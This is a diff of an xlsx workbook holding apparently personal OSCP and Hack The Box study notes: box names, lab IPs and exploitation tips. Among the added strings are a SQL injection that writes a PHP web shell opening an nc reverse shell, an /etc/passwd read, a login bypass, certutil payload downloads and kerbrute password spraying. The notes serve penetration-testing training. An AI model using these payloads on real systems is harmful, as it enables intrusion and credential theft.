--- a/Book1.xlsx
+++ b/Book1.xlsx
@@ -14,12 +14,14 @@
   <sheets>
     <sheet name="OSCP Boxes details" sheetId="1" r:id="rId1"/>
     <sheet name="HTB Boxes" sheetId="9" r:id="rId2"/>
-    <sheet name="Methodology" sheetId="15" r:id="rId3"/>
-    <sheet name="SQL Injections" sheetId="6" r:id="rId4"/>
-    <sheet name="Password brureforce technique" sheetId="4" r:id="rId5"/>
-    <sheet name="Kernel exploits" sheetId="3" r:id="rId6"/>
-    <sheet name="Linux Priv escalation" sheetId="8" r:id="rId7"/>
-    <sheet name="File transfer methods" sheetId="2" r:id="rId8"/>
+    <sheet name="DC Enumeration" sheetId="20" r:id="rId3"/>
+    <sheet name="Methodology" sheetId="15" r:id="rId4"/>
+    <sheet name="SQL Injections" sheetId="6" r:id="rId5"/>
+    <sheet name="Password brureforce technique" sheetId="4" r:id="rId6"/>
+    <sheet name="Kernel exploits" sheetId="3" r:id="rId7"/>
+    <sheet name="Linux Priv escalation" sheetId="8" r:id="rId8"/>
+    <sheet name="Windows Priv Escalation" sheetId="16" r:id="rId9"/>
+    <sheet name="File transfer methods" sheetId="2" r:id="rId10"/>
   </sheets>
   <definedNames>
     <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'OSCP Boxes details'!$A$1:$G$1</definedName>
@@ -34,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="341" uniqueCount="270">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="483" uniqueCount="394">
   <si>
     <t>Linux to Windows</t>
   </si>
@@ -46,9 +48,6 @@
   </si>
   <si>
     <t>in windows run the command-</t>
-  </si>
-  <si>
-    <t>certutil.exe -urlcache -split -f http://10.10.14.22/exploit.exe exploitee.exe</t>
   </si>
   <si>
     <t>smbserver.py ROPNOP /root/</t>
@@ -847,13 +846,389 @@
   </si>
   <si>
     <t>grandpa</t>
+  </si>
+  <si>
+    <t>If old OS- try kernel exploits</t>
+  </si>
+  <si>
+    <t>USerImpersonationtoken</t>
+  </si>
+  <si>
+    <t>If admin folder Is accessible by user and the root.txt is not accessible , and it is owned by user, then give the file Full permission usng below commands-</t>
+  </si>
+  <si>
+    <t>dir /q- shows owner</t>
+  </si>
+  <si>
+    <t xml:space="preserve">icacls root.txt /grant Alfred:(F)
+</t>
+  </si>
+  <si>
+    <t>dir /R - shows all readable files (hidden also)</t>
+  </si>
+  <si>
+    <t>whoami  /all</t>
+  </si>
+  <si>
+    <t>whoami /priv - check if any unusual permission</t>
+  </si>
+  <si>
+    <t>for any id found, try sql injection</t>
+  </si>
+  <si>
+    <t>In mysql, if Id is present, check the number of columns using order by</t>
+  </si>
+  <si>
+    <t>1+union+all+select+1,2,3,4,5,6,'&lt;?php passthru("nc -e /bin/bash 10.10.14.25 4444");'+into+outfile+"/var/www/html/exp4.php"--</t>
+  </si>
+  <si>
+    <t xml:space="preserve">then find the column where you can see the /etc/passwd , in below case, the column number where /etc/passwd was visible is 7 </t>
+  </si>
+  <si>
+    <t xml:space="preserve"> 1+union+all+select+1,2,3,4,5,6,load_file('/etc/passwd')+from+mysql.user--</t>
+  </si>
+  <si>
+    <t>https://www.exploit-db.com/papers/14635</t>
+  </si>
+  <si>
+    <t>for SAM file bruteforce-</t>
+  </si>
+  <si>
+    <t>john --wordlist=/usr/share/wordlists/rockyou.txt pass --format=NT</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> mRemoteNG password bruteforce-</t>
+  </si>
+  <si>
+    <t>https://github.com/haseebT/mRemoteNG-Decrypt</t>
+  </si>
+  <si>
+    <t>htb- bastin</t>
+  </si>
+  <si>
+    <t>robots.txt</t>
+  </si>
+  <si>
+    <t>try all combination if username ,password for ssh, wsman</t>
+  </si>
+  <si>
+    <t>Fuse</t>
+  </si>
+  <si>
+    <t>Access</t>
+  </si>
+  <si>
+    <t>Active</t>
+  </si>
+  <si>
+    <t>Popcorn</t>
+  </si>
+  <si>
+    <t>Chatterbox</t>
+  </si>
+  <si>
+    <t>Poison</t>
+  </si>
+  <si>
+    <t>haircut</t>
+  </si>
+  <si>
+    <t>screen 4.5 - suid bit set</t>
+  </si>
+  <si>
+    <t>https://github.com/jebidiah-anthony/htb_flujab</t>
+  </si>
+  <si>
+    <t xml:space="preserve">every username/password you think will work on web- try doing ssh </t>
+  </si>
+  <si>
+    <t>Mirai</t>
+  </si>
+  <si>
+    <t>10.1.10.48</t>
+  </si>
+  <si>
+    <t>raspberry pi</t>
+  </si>
+  <si>
+    <t>ssh using credentials pi and raspberry</t>
+  </si>
+  <si>
+    <t xml:space="preserve">sudo su, data was on /dev/sdb </t>
+  </si>
+  <si>
+    <t>friendzone</t>
+  </si>
+  <si>
+    <t>10.10.10.123</t>
+  </si>
+  <si>
+    <t>lfi</t>
+  </si>
+  <si>
+    <t>if you find any page name parameter in URL.. Try lfi</t>
+  </si>
+  <si>
+    <t>upload a shell thru smb then open it with lfi</t>
+  </si>
+  <si>
+    <t>cron</t>
+  </si>
+  <si>
+    <t>lazy</t>
+  </si>
+  <si>
+    <t>10.10.10.16</t>
+  </si>
+  <si>
+    <t>oracle padding</t>
+  </si>
+  <si>
+    <t xml:space="preserve">login using ssh keys </t>
+  </si>
+  <si>
+    <t>october</t>
+  </si>
+  <si>
+    <t>10.10.10.18</t>
+  </si>
+  <si>
+    <t>oracle vanilla cms</t>
+  </si>
+  <si>
+    <t>.php5 file uplaod shell exploit. Login as admin admin</t>
+  </si>
+  <si>
+    <t>https://www.exploit-db.com/exploits/41936</t>
+  </si>
+  <si>
+    <t>buffer overflow</t>
+  </si>
+  <si>
+    <t>solidstate</t>
+  </si>
+  <si>
+    <t xml:space="preserve">james server </t>
+  </si>
+  <si>
+    <t>login to james server using root/root</t>
+  </si>
+  <si>
+    <t>change password for users</t>
+  </si>
+  <si>
+    <t>telnet ip 110- open mailbox and check default creds</t>
+  </si>
+  <si>
+    <t>check /opt directory</t>
+  </si>
+  <si>
+    <t xml:space="preserve">tmp.py cron </t>
+  </si>
+  <si>
+    <t>if username is known, then do this-</t>
+  </si>
+  <si>
+    <t>username= admin'-- -</t>
+  </si>
+  <si>
+    <t>Europa</t>
+  </si>
+  <si>
+    <t>sql</t>
+  </si>
+  <si>
+    <t>sql injection login bypass, then openvpn configuration command</t>
+  </si>
+  <si>
+    <t>injection</t>
+  </si>
+  <si>
+    <t>curl file upload</t>
+  </si>
+  <si>
+    <t>uploding shell to different directory (uploads) using -o</t>
+  </si>
+  <si>
+    <t>magic</t>
+  </si>
+  <si>
+    <t>php upload in image file</t>
+  </si>
+  <si>
+    <t>eximtools, magic numners</t>
+  </si>
+  <si>
+    <t>https://github.com/xapax/security/blob/master/bypass_image_upload.md</t>
+  </si>
+  <si>
+    <t>https://gobiasinfosec.blog/2019/12/24/file-upload-attacks-php-reverse-shell/</t>
+  </si>
+  <si>
+    <t>Resolute</t>
+  </si>
+  <si>
+    <t>domain controller</t>
+  </si>
+  <si>
+    <t>got password in enum4linux, tried for all. got one user</t>
+  </si>
+  <si>
+    <t>cmdlist /key- nothing</t>
+  </si>
+  <si>
+    <t>dir -force  --&gt; shows a directory having ryan passwrd</t>
+  </si>
+  <si>
+    <t>login as ryan, whoami /all</t>
+  </si>
+  <si>
+    <t>under group dns admin</t>
+  </si>
+  <si>
+    <t>cascade</t>
+  </si>
+  <si>
+    <t>ldap enumeration shows password for one user</t>
+  </si>
+  <si>
+    <t>finding creds in temp folder</t>
+  </si>
+  <si>
+    <t>python3 kerbrute.py -domain MEGABANK.LOCAL -users ~/HTB/monte/user -passwords ~/HTB/monte/user -dc-ip 10.10.10.172</t>
+  </si>
+  <si>
+    <t>monteverde</t>
+  </si>
+  <si>
+    <t>windws</t>
+  </si>
+  <si>
+    <t>domain cotrollr</t>
+  </si>
+  <si>
+    <t>smb enum</t>
+  </si>
+  <si>
+    <t>azure admin to domain admins</t>
+  </si>
+  <si>
+    <t>celestrial</t>
+  </si>
+  <si>
+    <t>java deserialization</t>
+  </si>
+  <si>
+    <t>cronjob</t>
+  </si>
+  <si>
+    <t>https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/</t>
+  </si>
+  <si>
+    <t>waldo</t>
+  </si>
+  <si>
+    <t>bypassing lfi filetr</t>
+  </si>
+  <si>
+    <t>../….//….//….//….//</t>
+  </si>
+  <si>
+    <t>carrier</t>
+  </si>
+  <si>
+    <t xml:space="preserve">snmp pass, lyghtspeed login, command injection thru </t>
+  </si>
+  <si>
+    <t>ps aux | grep root;id</t>
+  </si>
+  <si>
+    <t>tmux runninga s root</t>
+  </si>
+  <si>
+    <t>https://medium.com/@int0x33/day-69-hijacking-tmux-sessions-2-priv-esc-f05893c4ded0</t>
+  </si>
+  <si>
+    <t>devops</t>
+  </si>
+  <si>
+    <t>xxe</t>
+  </si>
+  <si>
+    <t>read /etc/passwd, read ssh keys .. Login as roosa</t>
+  </si>
+  <si>
+    <t>.git backup</t>
+  </si>
+  <si>
+    <t>./linenum.sh -t -k password</t>
+  </si>
+  <si>
+    <t>hawk</t>
+  </si>
+  <si>
+    <t>drupal rce, getting admin passowrd</t>
+  </si>
+  <si>
+    <t>oho code injection</t>
+  </si>
+  <si>
+    <t xml:space="preserve">h2 console rce </t>
+  </si>
+  <si>
+    <t>https://www.exploit-db.com/exploits/45506</t>
+  </si>
+  <si>
+    <t>/home/roosa/.ssh/id_rsa</t>
+  </si>
+  <si>
+    <t xml:space="preserve">ls -la </t>
+  </si>
+  <si>
+    <t>dir -force</t>
+  </si>
+  <si>
+    <t>certutil.exe -urlcache -split -f http://10.10.14.15/shell.exe</t>
+  </si>
+  <si>
+    <t>bart</t>
+  </si>
+  <si>
+    <t>server monitor</t>
+  </si>
+  <si>
+    <t>server monitor login page brteforce, the internla-chat brureforce</t>
+  </si>
+  <si>
+    <t>log poisoing , uploading shell</t>
+  </si>
+  <si>
+    <t>commented out code- must check</t>
+  </si>
+  <si>
+    <t>doctor</t>
+  </si>
+  <si>
+    <t>sudo -u user</t>
+  </si>
+  <si>
+    <t>sudo -l</t>
+  </si>
+  <si>
+    <t>for windows machine</t>
+  </si>
+  <si>
+    <t>any username password found, try smb login or wimrm</t>
+  </si>
+  <si>
+    <t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <fonts count="5" x14ac:knownFonts="1">
+  <fonts count="7" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
       <color theme="1"/>
@@ -889,6 +1264,21 @@
       <name val="Consolas"/>
       <family val="3"/>
     </font>
+    <font>
+      <b/>
+      <sz val="11"/>
+      <color rgb="FFFF0000"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+      <scheme val="minor"/>
+    </font>
+    <font>
+      <sz val="11"/>
+      <color rgb="FFFF0000"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+      <scheme val="minor"/>
+    </font>
   </fonts>
   <fills count="4">
     <fill>
@@ -923,7 +1313,7 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="3" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="10">
+  <cellXfs count="12">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1"/>
@@ -942,6 +1332,8 @@
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1"/>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1"/>
   </cellXfs>
   <cellStyles count="2">
     <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
@@ -1225,8 +1617,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:G130"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A121" workbookViewId="0">
-      <selection activeCell="D127" sqref="D127"/>
+    <sheetView tabSelected="1" topLeftCell="A16" workbookViewId="0">
+      <selection activeCell="E25" sqref="E25"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -1242,766 +1634,766 @@
   <sheetData>
     <row r="1" spans="1:7" s="2" customFormat="1" x14ac:dyDescent="0.25">
       <c r="A1" s="2" t="s">
-        <v>151</v>
+        <v>150</v>
       </c>
       <c r="B1" s="2" t="s">
+        <v>12</v>
+      </c>
+      <c r="C1" s="2" t="s">
+        <v>129</v>
+      </c>
+      <c r="D1" s="2" t="s">
+        <v>14</v>
+      </c>
+      <c r="E1" s="2" t="s">
+        <v>16</v>
+      </c>
+      <c r="F1" s="2" t="s">
         <v>13</v>
       </c>
-      <c r="C1" s="2" t="s">
-        <v>130</v>
-      </c>
-      <c r="D1" s="2" t="s">
-        <v>15</v>
-      </c>
-      <c r="E1" s="2" t="s">
-        <v>17</v>
-      </c>
-      <c r="F1" s="2" t="s">
-        <v>14</v>
-      </c>
       <c r="G1" s="2" t="s">
-        <v>70</v>
+        <v>69</v>
       </c>
     </row>
     <row r="3" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A3" t="s">
-        <v>16</v>
+        <v>15</v>
       </c>
       <c r="B3" t="s">
+        <v>17</v>
+      </c>
+      <c r="C3" t="s">
+        <v>130</v>
+      </c>
+      <c r="D3" t="s">
         <v>18</v>
       </c>
-      <c r="C3" t="s">
-        <v>131</v>
-      </c>
-      <c r="D3" t="s">
+      <c r="E3" s="4" t="s">
         <v>19</v>
       </c>
-      <c r="E3" s="4" t="s">
+      <c r="F3" t="s">
         <v>20</v>
-      </c>
-      <c r="F3" t="s">
-        <v>21</v>
       </c>
     </row>
     <row r="5" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A5" t="s">
+        <v>21</v>
+      </c>
+      <c r="B5" t="s">
         <v>22</v>
       </c>
-      <c r="B5" t="s">
-        <v>23</v>
-      </c>
       <c r="C5" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D5" t="s">
-        <v>25</v>
+        <v>24</v>
       </c>
       <c r="E5" t="s">
-        <v>29</v>
+        <v>28</v>
       </c>
       <c r="F5" t="s">
-        <v>174</v>
+        <v>173</v>
       </c>
     </row>
     <row r="7" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A7" t="s">
+        <v>131</v>
+      </c>
+      <c r="B7" t="s">
         <v>132</v>
       </c>
-      <c r="B7" t="s">
-        <v>133</v>
-      </c>
       <c r="C7" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="E7" t="s">
-        <v>173</v>
+        <v>172</v>
       </c>
       <c r="F7" t="s">
-        <v>21</v>
+        <v>20</v>
       </c>
     </row>
     <row r="9" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A9" t="s">
-        <v>24</v>
+        <v>23</v>
       </c>
       <c r="B9" t="s">
-        <v>26</v>
+        <v>25</v>
       </c>
       <c r="C9" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D9" t="s">
-        <v>28</v>
+        <v>27</v>
       </c>
       <c r="E9" t="s">
-        <v>179</v>
+        <v>178</v>
       </c>
       <c r="F9" t="s">
-        <v>175</v>
+        <v>174</v>
       </c>
     </row>
     <row r="11" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A11" t="s">
-        <v>27</v>
+        <v>26</v>
       </c>
       <c r="B11" t="s">
-        <v>30</v>
+        <v>29</v>
       </c>
       <c r="C11" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D11" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="E11" t="s">
-        <v>178</v>
+        <v>177</v>
       </c>
       <c r="F11" t="s">
-        <v>177</v>
+        <v>176</v>
       </c>
     </row>
     <row r="12" spans="1:7" x14ac:dyDescent="0.25">
       <c r="F12" t="s">
-        <v>176</v>
+        <v>175</v>
       </c>
     </row>
     <row r="13" spans="1:7" ht="60" x14ac:dyDescent="0.25">
       <c r="A13" t="s">
+        <v>30</v>
+      </c>
+      <c r="B13" t="s">
         <v>31</v>
       </c>
-      <c r="B13" t="s">
-        <v>32</v>
-      </c>
       <c r="C13" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D13" t="s">
+        <v>66</v>
+      </c>
+      <c r="E13" s="6" t="s">
         <v>67</v>
       </c>
-      <c r="E13" s="6" t="s">
+      <c r="F13" t="s">
         <v>68</v>
       </c>
-      <c r="F13" t="s">
-        <v>69</v>
-      </c>
       <c r="G13" s="4" t="s">
-        <v>71</v>
+        <v>70</v>
       </c>
     </row>
     <row r="15" spans="1:7" x14ac:dyDescent="0.25">
       <c r="A15" t="s">
+        <v>32</v>
+      </c>
+      <c r="B15" t="s">
         <v>33</v>
       </c>
-      <c r="B15" t="s">
-        <v>34</v>
-      </c>
       <c r="C15" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D15" t="s">
-        <v>25</v>
+        <v>24</v>
       </c>
       <c r="E15" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
       <c r="F15" t="s">
-        <v>53</v>
+        <v>52</v>
       </c>
     </row>
     <row r="17" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A17" t="s">
+        <v>34</v>
+      </c>
+      <c r="B17" t="s">
         <v>35</v>
       </c>
-      <c r="B17" t="s">
-        <v>36</v>
-      </c>
       <c r="C17" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D17" t="s">
-        <v>180</v>
+        <v>179</v>
       </c>
       <c r="E17" t="s">
-        <v>184</v>
+        <v>183</v>
       </c>
       <c r="F17" t="s">
-        <v>170</v>
+        <v>169</v>
       </c>
     </row>
     <row r="19" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A19" t="s">
+        <v>36</v>
+      </c>
+      <c r="B19" t="s">
         <v>37</v>
       </c>
-      <c r="B19" t="s">
-        <v>38</v>
-      </c>
       <c r="C19" t="s">
-        <v>134</v>
+        <v>133</v>
       </c>
     </row>
     <row r="21" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A21" t="s">
+        <v>38</v>
+      </c>
+      <c r="B21" t="s">
         <v>39</v>
       </c>
-      <c r="B21" t="s">
-        <v>40</v>
-      </c>
       <c r="C21" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D21" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="E21" t="s">
-        <v>181</v>
+        <v>180</v>
       </c>
       <c r="F21" t="s">
-        <v>185</v>
+        <v>184</v>
       </c>
     </row>
     <row r="23" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A23" t="s">
+        <v>40</v>
+      </c>
+      <c r="B23" t="s">
         <v>41</v>
       </c>
-      <c r="B23" t="s">
-        <v>42</v>
-      </c>
       <c r="C23" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D23" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="E23" t="s">
-        <v>182</v>
+        <v>181</v>
       </c>
     </row>
     <row r="25" spans="1:6" ht="45" x14ac:dyDescent="0.25">
       <c r="A25" t="s">
+        <v>42</v>
+      </c>
+      <c r="B25" t="s">
         <v>43</v>
       </c>
-      <c r="B25" t="s">
-        <v>44</v>
-      </c>
       <c r="C25" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D25" t="s">
-        <v>186</v>
+        <v>185</v>
       </c>
       <c r="E25" s="6" t="s">
-        <v>214</v>
+        <v>213</v>
       </c>
       <c r="F25" t="s">
-        <v>175</v>
+        <v>174</v>
       </c>
     </row>
     <row r="28" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A28" t="s">
+        <v>134</v>
+      </c>
+      <c r="B28" t="s">
+        <v>121</v>
+      </c>
+      <c r="C28" s="7" t="s">
         <v>135</v>
-      </c>
-      <c r="B28" t="s">
-        <v>122</v>
-      </c>
-      <c r="C28" s="7" t="s">
-        <v>136</v>
       </c>
     </row>
     <row r="30" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A30" t="s">
+        <v>44</v>
+      </c>
+      <c r="B30" t="s">
         <v>45</v>
       </c>
-      <c r="B30" t="s">
-        <v>46</v>
-      </c>
       <c r="C30" s="7" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
     </row>
     <row r="32" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A32" t="s">
+        <v>46</v>
+      </c>
+      <c r="B32" t="s">
         <v>47</v>
       </c>
-      <c r="B32" t="s">
-        <v>48</v>
-      </c>
       <c r="C32" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D32" t="s">
-        <v>180</v>
+        <v>179</v>
       </c>
       <c r="E32" t="s">
-        <v>196</v>
+        <v>195</v>
       </c>
     </row>
     <row r="34" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A34" t="s">
+        <v>78</v>
+      </c>
+      <c r="B34" t="s">
         <v>79</v>
       </c>
-      <c r="B34" t="s">
-        <v>80</v>
-      </c>
       <c r="C34" t="s">
-        <v>137</v>
+        <v>136</v>
       </c>
     </row>
     <row r="36" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A36" t="s">
-        <v>50</v>
+        <v>49</v>
       </c>
       <c r="B36" t="s">
-        <v>49</v>
+        <v>48</v>
       </c>
       <c r="C36" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D36" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="E36" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="F36" t="s">
-        <v>21</v>
+        <v>20</v>
       </c>
     </row>
     <row r="38" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A38" t="s">
-        <v>52</v>
+        <v>51</v>
       </c>
       <c r="B38" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
       <c r="C38" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D38" t="s">
-        <v>25</v>
+        <v>24</v>
       </c>
       <c r="E38" t="s">
-        <v>183</v>
+        <v>182</v>
       </c>
       <c r="F38" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
     </row>
     <row r="39" spans="1:6" x14ac:dyDescent="0.25">
       <c r="E39" t="s">
-        <v>72</v>
+        <v>71</v>
       </c>
     </row>
     <row r="40" spans="1:6" x14ac:dyDescent="0.25">
       <c r="E40" s="3" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
     </row>
     <row r="41" spans="1:6" ht="30" x14ac:dyDescent="0.25">
       <c r="E41" s="4" t="s">
-        <v>78</v>
+        <v>77</v>
       </c>
     </row>
     <row r="46" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A46" t="s">
-        <v>87</v>
+        <v>86</v>
       </c>
       <c r="B46" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
       <c r="C46" s="7" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
     </row>
     <row r="50" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A50" t="s">
-        <v>88</v>
+        <v>87</v>
       </c>
       <c r="B50" t="s">
-        <v>82</v>
+        <v>81</v>
       </c>
       <c r="C50" s="7" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
     </row>
     <row r="54" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A54" t="s">
-        <v>88</v>
+        <v>87</v>
       </c>
       <c r="B54" t="s">
-        <v>83</v>
+        <v>82</v>
       </c>
       <c r="C54" s="7" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
     </row>
     <row r="57" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A57" t="s">
-        <v>88</v>
+        <v>87</v>
       </c>
       <c r="B57" t="s">
-        <v>84</v>
+        <v>83</v>
       </c>
       <c r="C57" s="7" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
     </row>
     <row r="61" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A61" t="s">
-        <v>88</v>
+        <v>87</v>
       </c>
       <c r="B61" t="s">
-        <v>85</v>
+        <v>84</v>
       </c>
       <c r="C61" s="8" t="s">
-        <v>157</v>
+        <v>156</v>
       </c>
       <c r="D61" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="E61" t="s">
-        <v>160</v>
+        <v>159</v>
       </c>
       <c r="F61" t="s">
-        <v>193</v>
+        <v>192</v>
       </c>
     </row>
     <row r="62" spans="1:6" x14ac:dyDescent="0.25">
       <c r="E62" t="s">
-        <v>161</v>
+        <v>160</v>
       </c>
     </row>
     <row r="65" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A65" t="s">
-        <v>89</v>
+        <v>88</v>
       </c>
       <c r="B65" t="s">
-        <v>86</v>
+        <v>85</v>
       </c>
       <c r="C65" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D65" t="s">
-        <v>28</v>
+        <v>27</v>
       </c>
       <c r="E65" t="s">
+        <v>207</v>
+      </c>
+      <c r="F65" t="s">
         <v>208</v>
-      </c>
-      <c r="F65" t="s">
-        <v>209</v>
       </c>
     </row>
     <row r="68" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A68" t="s">
-        <v>90</v>
+        <v>89</v>
       </c>
       <c r="B68" t="s">
-        <v>108</v>
+        <v>107</v>
       </c>
       <c r="C68" s="8" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="D68" t="s">
-        <v>180</v>
+        <v>179</v>
       </c>
       <c r="E68" t="s">
-        <v>205</v>
+        <v>204</v>
       </c>
     </row>
     <row r="69" spans="1:6" x14ac:dyDescent="0.25">
       <c r="E69" t="s">
-        <v>206</v>
+        <v>205</v>
       </c>
     </row>
     <row r="71" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A71" t="s">
+        <v>90</v>
+      </c>
+      <c r="B71" t="s">
         <v>91</v>
       </c>
-      <c r="B71" t="s">
-        <v>92</v>
-      </c>
       <c r="C71" t="s">
-        <v>139</v>
+        <v>138</v>
       </c>
       <c r="D71" t="s">
-        <v>180</v>
+        <v>179</v>
       </c>
       <c r="E71" t="s">
-        <v>207</v>
+        <v>206</v>
       </c>
     </row>
     <row r="75" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A75" t="s">
+        <v>93</v>
+      </c>
+      <c r="B75" t="s">
         <v>94</v>
       </c>
-      <c r="B75" t="s">
-        <v>95</v>
-      </c>
       <c r="C75" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
     </row>
     <row r="78" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A78" t="s">
-        <v>93</v>
+        <v>92</v>
       </c>
       <c r="B78" t="s">
-        <v>96</v>
+        <v>95</v>
       </c>
       <c r="C78" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D78" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="E78" t="s">
-        <v>199</v>
+        <v>198</v>
       </c>
       <c r="F78" t="s">
-        <v>21</v>
+        <v>20</v>
       </c>
     </row>
     <row r="81" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A81" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="B81" t="s">
-        <v>97</v>
+        <v>96</v>
       </c>
       <c r="C81" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
     </row>
     <row r="84" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A84" t="s">
-        <v>140</v>
+        <v>139</v>
       </c>
       <c r="B84" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="C84" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D84" t="s">
+        <v>199</v>
+      </c>
+      <c r="E84" t="s">
         <v>200</v>
       </c>
-      <c r="E84" t="s">
+      <c r="F84" t="s">
         <v>201</v>
-      </c>
-      <c r="F84" t="s">
-        <v>202</v>
       </c>
     </row>
     <row r="87" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A87" t="s">
-        <v>164</v>
+        <v>163</v>
       </c>
       <c r="B87" t="s">
-        <v>124</v>
+        <v>123</v>
       </c>
     </row>
     <row r="90" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A90" t="s">
-        <v>141</v>
+        <v>140</v>
       </c>
       <c r="B90" t="s">
-        <v>125</v>
+        <v>124</v>
       </c>
     </row>
     <row r="92" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A92" t="s">
-        <v>143</v>
+        <v>142</v>
       </c>
       <c r="B92" t="s">
-        <v>126</v>
+        <v>125</v>
       </c>
       <c r="C92" t="s">
-        <v>131</v>
+        <v>130</v>
       </c>
       <c r="D92" t="s">
-        <v>200</v>
+        <v>199</v>
       </c>
       <c r="E92" t="s">
-        <v>203</v>
+        <v>202</v>
